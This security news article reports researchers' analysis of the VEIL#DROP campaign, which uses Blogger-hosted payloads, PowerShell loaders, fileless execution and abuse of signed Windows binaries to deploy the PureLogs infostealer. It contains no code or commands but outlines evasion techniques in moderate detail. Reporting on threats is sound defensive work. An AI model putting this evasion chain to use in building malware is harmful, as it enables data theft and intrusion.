Cybersecurity experts have identified a sophisticated malware distribution method that employs social engineering tactics and the Blogger platform to deliver a data-stealing tool known as PureLogs. This operation has been dubbed VEIL#DROP by researchers at Securonix, who believe the initial infection vectors could involve spear-phishing or drive-by compromises, targeting users who inadvertently visit malicious or compromised websites.
Complex Infection Chain
The attack sequence initiates with a JavaScript file, cleverly disguised as a document, which executes via Windows Script Host, activating PowerShell with specific execution policies bypassed. Researchers Akshay Gaikwad, Shikha Sangwan, and Aaron Beardslee have detailed this in a report, highlighting the stealthy retrieval of subsequent payloads from a Blogger page. By exploiting Google’s trusted infrastructure, the attackers can circumvent reputation-based defenses and blend in with normal web traffic.
Once downloaded, the PowerShell payload facilitates the loading of benign websites such as Google, creating a facade of normal activity while the malware silently progresses to deploy PureLogs Stealer. This .NET-based infostealer is notorious for extracting a wide range of sensitive information from compromised systems.
Evasive Techniques and Payload Execution
The PowerShell loader is designed to run follow-up commands without restrictions, terminate processes like “wscript.exe” to reduce forensic evidence, and erase traces of its initial execution. The loader also decrypts embedded payloads using XOR encryption. According to Securonix, this phase involves generating dynamic stages and incorporating runtime mutation, making the malware harder to detect by avoiding static indicators and predictable patterns.
A unique blogspot URL is constructed for each execution, incorporating random elements to bypass static URL signatures and filtering mechanisms. Furthermore, the script undergoes runtime mutation, replacing placeholders with random values, effectively thwarting signature-based detections.
Advanced Evasion and Living-off-the-land Strategies
The script ultimately executes in memory, leaving no footprints on the disk and acting as a loader for the main malware component, a .NET assembly. This employs reflective code loading, allowing the malware to run directly from memory without being detected. If security measures block the direct execution of .NET assemblies, the loader resorts to using Microsoft-signed binaries, such as “regsvcs.exe” and “msbuild.exe,” to maintain stealth.
This “living-off-the-land” approach, leveraging trusted system binaries, enables attackers to mask their activities as legitimate processes. Interestingly, the loader does not rely on a single method but instead follows a cascading execution model, trying various methods until successful.
Implications for Cybersecurity
An infection by PureLogs Stealer can have far-reaching effects, extending beyond the initially compromised system. The harvested data could facilitate deeper penetration into the target’s infrastructure, allowing adversaries to establish persistence, conduct lateral movements, and potentially compromise cloud services. As observed by Securonix, the combination of various evasion techniques, including fileless execution and trusted service abuse, illustrates a calculated effort to avoid detection by traditional antivirus solutions and minimize forensic evidence throughout the malware’s lifecycle.
